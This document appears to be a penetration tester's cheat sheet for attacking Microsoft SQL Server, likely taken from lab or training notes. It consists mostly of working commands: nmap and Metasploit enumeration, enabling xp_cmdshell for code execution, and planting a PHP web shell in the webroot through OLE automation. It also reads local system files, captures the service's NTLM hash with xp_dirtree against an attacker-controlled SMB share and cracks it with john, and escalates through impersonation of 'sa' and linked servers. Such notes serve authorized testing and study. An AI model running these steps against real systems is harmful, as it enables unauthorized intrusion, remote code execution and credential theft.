MSSQL (1433)

TCP - 1433

UDP - 1434

TCP - 2433 if hidden mode

Footprinting using nmap

sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248

MSSQL ping in metasploit

use scanner/mssql/mssql_ping

Connecting with MSSQL client

python3 mssqlclient.py Administrator@10.129.201.248 -windows-auth

Show databases command

select name from sys.databases

MSSQL tools:

• mssql-cli

• SQL Server Powershell

• HediSQL

• SQLPro

• Impacket's mssqlclient.py

Protocol Specific Attacks

Code Execution

1> xp_cmdshell 'whoami'
2> GO

output
-----------------------------
no service\mssql$sqlexpress
NULL
(2 rows affected)

If xp_cmdshell is disabled, we can enable it

-- To allow advanced options to be changed.  
EXECUTE sp_configure 'show advanced options', 1
GO

-- To update the currently configured value for advanced options.  
RECONFIGURE
GO  

-- To enable the feature.  
EXECUTE sp_configure 'xp_cmdshell', 1
GO  

-- To update the currently configured value for this feature.  
RECONFIGURE
GOl

Note:

There are other methods to get command execution, such as adding extended stored procedures, CLR Assemblies, SQL Server Agent Jobs, and external scripts

xp_regwrite can also be used for priv esc

Write Local Files

1. Enable Ole automation procedures (must be admin)

1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO

1. Create a File

1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO

Read Local Files

1> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
2> GOl

Capture MSSQL Service Hash

1. Start Responder or impacket-smbserver

2. XP_DIRTREE Hash Stealing

   1> EXEC master..xp_dirtree '\\10.10.110.17\share\'
   2> GO
   
   subdirectory    depth
   --------------- -----------

   XP_SUBDIRS Hash Stealing

   1> EXEC master..xp_subdirs '\\10.10.110.17\share\'
   2> GO
   
   HResult 0x55F6, Level 16, State 1
   xp_subdirs could not access '\\10.10.110.17\share\*.*': FindFirstFile() returned error 5, 'Access is denied'

3. We will receive the hash if success

4. You can pth or crack the hash

   Cracking NTLMv2 hash john -w=rockyou.txt --format=netntlmv2 hashes.txt

Impersonating Existing Users

1. Identify users we can impersonate

1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO

1. Verify our current user and role

1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> go

1. Impersonate the SA user

1> EXECUTE AS LOGIN = 'sa'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO

Note: Use master if there is an error before running the execute as login. Use revert to change back to ht previous user.

Communicate with other databases

1. Identify linked servers

1> SELECT srvname, isremote FROM sysservers
2> GO

1. if isremote=0 that is lined server, if not, that is a remote server

1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
2> GO